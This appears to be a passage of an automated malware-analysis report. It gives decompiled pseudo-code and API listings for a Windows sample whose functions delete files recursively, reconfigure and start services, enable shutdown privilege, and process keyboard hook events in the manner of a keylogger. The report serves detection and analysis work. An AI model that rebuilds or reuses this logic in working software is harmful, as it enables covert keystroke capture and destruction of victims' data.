				wcscat( &_v1052, L"\\*");
				wcscpy( &_v532, _a4);
				wcscat( &_v532, "\\");
				_t46 = FindFirstFileW( &_v1052,  &_v1644);
				_v12 = _t46;
				if(_t46 == 0xffffffff) {
					L18:
					return 0;
				}
				wcscpy( &_v1052,  &_v532);
				_v5 = 1;
				do {
					if(FindNextFileW(_v12,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L17:
							FindClose(_v12);
							goto L18;
						}
						_v5 = _v5 & 0x00000000;
						goto L14;
					}
					if(E00412BBA( &(_v1644.cFileName)) != 0) {
						goto L14;
					}
					wcscat( &_v532,  &(_v1644.cFileName));
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L17;
						} else {
							L7:
							wcscpy( &_v532,  &_v1052);
							goto L14;
						}
					}
					if(E00412BEE( &_v532) == 0) {
						goto L17;
					}
					RemoveDirectoryW( &_v532);
					goto L7;
					L14:
				} while (_v5 != 0);
				FindClose(_v12);
				return RemoveDirectoryW(_a4);
			}









                                        0x00412c0a
                                        0x00412c1e
                                        0x00412c2a
                                        0x00412c38
                                        0x00412c4b
                                        0x00412c54
                                        0x00412c57
                                        0x00412d52
                                        0x00000000
                                        0x00412d52
                                        0x00412c6b
                                        0x00412c75
                                        0x00412c79
                                        0x00412c8b
                                        0x00412d26
                                        0x00412d49
                                        0x00412d4c
                                        0x00000000
                                        0x00412d4c
                                        0x00412d28
                                        0x00000000
                                        0x00412d28
                                        0x00412ca0
                                        0x00000000
                                        0x00000000
                                        0x00412cb4
                                        0x00412cbf
                                        0x00412cf6
                                        0x00412d04
                                        0x00412d04
                                        0x00412d19
                                        0x00000000
                                        0x00412d1b
                                        0x00412cdb
                                        0x00412ce9
                                        0x00000000
                                        0x00412cec
                                        0x00412d19
                                        0x00412cd0
                                        0x00000000
                                        0x00000000
                                        0x00412cd9
                                        0x00000000
                                        0x00412d2c
                                        0x00412d2c
                                        0x00412d39
                                        0x00000000

                                        APIs
                                        • wcscpy.MSVCRT ref: 00412C0A
                                        • wcscat.MSVCRT ref: 00412C1E
                                        • wcscpy.MSVCRT ref: 00412C2A
                                        • wcscat.MSVCRT ref: 00412C38
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                        • wcscpy.MSVCRT ref: 00412C6B
                                        • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                        • wcscat.MSVCRT ref: 00412CB4
                                        • wcscpy.MSVCRT ref: 00412CE9
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                        • DeleteFileW.KERNEL32(?), ref: 00412D11
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                        • GetLastError.KERNEL32 ref: 00412D1D
                                        • FindClose.KERNEL32(004085F5), ref: 00412D39
                                        • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                        • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                          • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                          • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 520940213-0
                                        • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                        • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                        • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                        • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                        0x0041192d
                                        0x00411933
                                        0x0041193e
                                        0x00411940
                                        0x0041194e
                                        0x00411952
                                        0x00411961
                                        0x00411964
                                        0x00411966
                                        0x00411976
                                        0x00000000
                                        0x00411968
                                        0x00411968
                                        0x00411969
                                        0x00411972
                                        0x00000000
                                        0x0041196b
                                        0x0041196c
                                        0x0041196e
                                        0x00411978
                                        0x00411978
                                        0x00411978
                                        0x0041196c
                                        0x00411969
                                        0x00411995
                                        0x00411998
                                        0x0041199b
                                        0x00411954
                                        0x00411955
                                        0x00411955
                                        0x004119a0
                                        0x004119ac

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                        • String ID:
                                        • API String ID: 760094045-0
                                        • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                        • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411700, Relevance: 12.0, APIs: 8, Instructions: 42serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00411700(void* _a4) {
				short* _t5;
				signed int _t12;
				void* _t15;
				void* _t16;

				_t12 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t16 = _t5;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t15 = OpenServiceW(_t16, _t5, 0x10);
				if(_t15 != 0) {
					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
					CloseServiceHandle(_t16);
					CloseServiceHandle(_t15);
				} else {
					CloseServiceHandle(_t16);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t12;
			}







                                        0x00411706
                                        0x0041170c
                                        0x00411717
                                        0x00411719
                                        0x00411727
                                        0x0041172b
                                        0x00411748
                                        0x0041174b
                                        0x0041174e
                                        0x0041172d
                                        0x0041172e
                                        0x0041172e
                                        0x00411753
                                        0x0041175f

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                        • String ID:
                                        • API String ID: 3595611540-0
                                        • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                        • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                        • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                        • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                        0x0040ec23
                                        0x0040ec35
                                        0x0040ec46
                                        0x0040ec4d
                                        0x0040ec54
                                        0x0040ec5a
                                        0x0040ec62
                                        0x0040ec68

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                        • GetLastError.KERNEL32 ref: 0040EC5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                        • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12);
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16);
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                        0x0041216f
                                        0x0041217d
                                        0x00412186
                                        0x00412195
                                        0x004121a5
                                        0x004121ae
                                        0x004121b9
                                        0x004121bd
                                        0x004121c9
                                        0x004121d4
                                        0x004121dd
                                        0x004121e7

                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                        • String ID:
                                        • API String ID: 3382107156-0
                                        • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                        • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                        0x00409d16
                                        0x00409d22
                                        0x00409d2d
                                        0x00409d37
                                        0x00409d3b

                                        APIs
                                        • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                        • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                        • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040532D, Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
				void* _t19;
				void* _t26;
				struct HHOOK__** _t32;
				signed int _t33;

				_t32 = _a4;
				_t33 = 5;
				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
				if(_a8 == 0) {
					_t19 = _a12 - 0x100;
					if(_t19 == 0) {
						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
							_t32[0xb] = _t32[0xb] & 0x00000000;
						} else {
							_t32[0xb] = 1;
						}
						E00406BA7(_t32);
						E00406BCB(_t32);
						E00405EB2(_t32);
						if(_t32[0xb] == 0) {
							E00406952(_t32);
						}
						_t32[0xb] = _t32[0xb] & 0x00000000;
					} else {
						_t26 = _t19 - 1;
						if(_t26 == 0) {
							E00406BB9(_t32);
							E00406BDD(_t32);
							E00406B61(_t32);
						} else {
							if(_t26 == 3) {
								E00406AD1(_t32);
							}
						}
					}
				}
				return CallNextHookEx( *_t32, _a8, _a12, _a16);
			}







                                        0x00405335
                                        0x00405342
                                        0x00405343
                                        0x00405345
                                        0x0040534a
                                        0x0040534f
                                        0x00405386
                                        0x00405398
                                        0x00405392
                                        0x00405392
                                        0x00405392
                                        0x0040539e
                                        0x004053a5
                                        0x004053ac
                                        0x004053b5
                                        0x004053b9
                                        0x004053b9
                                        0x004053be
                                        0x00405351
                                        0x00405351
                                        0x00405352
                                        0x00405364
                                        0x0040536b
                                        0x00405372
                                        0x00405354
                                        0x00405357
                                        0x0040535b
                                        0x0040535b
                                        0x00405357
                                        0x00405352
                                        0x0040534f
                                        0x004053d7

                                        APIs
                                        • GetKeyState.USER32 ref: 00405381
                                        • GetKeyState.USER32 ref: 0040538A
                                          • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                        • CallNextHookEx.USER32 ref: 004053CD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                        • String ID:
                                        • API String ID: 98962008-0
                                        • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                        • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                        • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                        • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409E7D, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00409E7D(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                        0x00409e8e
                                        0x00409e9f
                                        0x00409ea9

                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                        • String ID:
                                        • API String ID: 4090406865-0
                                        • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                        • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                        • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                        • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405156, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405156(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                        0x00405157
                                        0x0040515b
                                        0x00405163
                                        0x00405168
                                        0x0040516c
                                        0x0040517b
                                        0x0040517b
                                        0x0040517f
                                        0x0040516e
                                        0x00405170
                                        0x00405174
                                        0x00000000
                                        0x00405176
                                        0x00405176
                                        0x0040517a
                                        0x0040517a
                                        0x00405174

                                        APIs
                                        • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayout
                                        • String ID:
                                        • API String ID: 194098044-0
                                        • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                        • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                        • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                        • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004124A0, Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t10;

				_t10 = _a4;
				_t6 = _a8;
				asm("cpuid");
				 *_t10 = _t6;
				 *((intOrPtr*)(_t10 + 4)) = _t7;
				 *((intOrPtr*)(_t10 + 8)) = 0;
				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
				return _t6;
			}






                                        0x004124a5
                                        0x004124a8
                                        0x004124ad
                                        0x004124af
                                        0x004124b1
                                        0x004124b4
                                        0x004124b7
                                        0x004124bd

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                        • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                        • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                        • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AE6A, Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
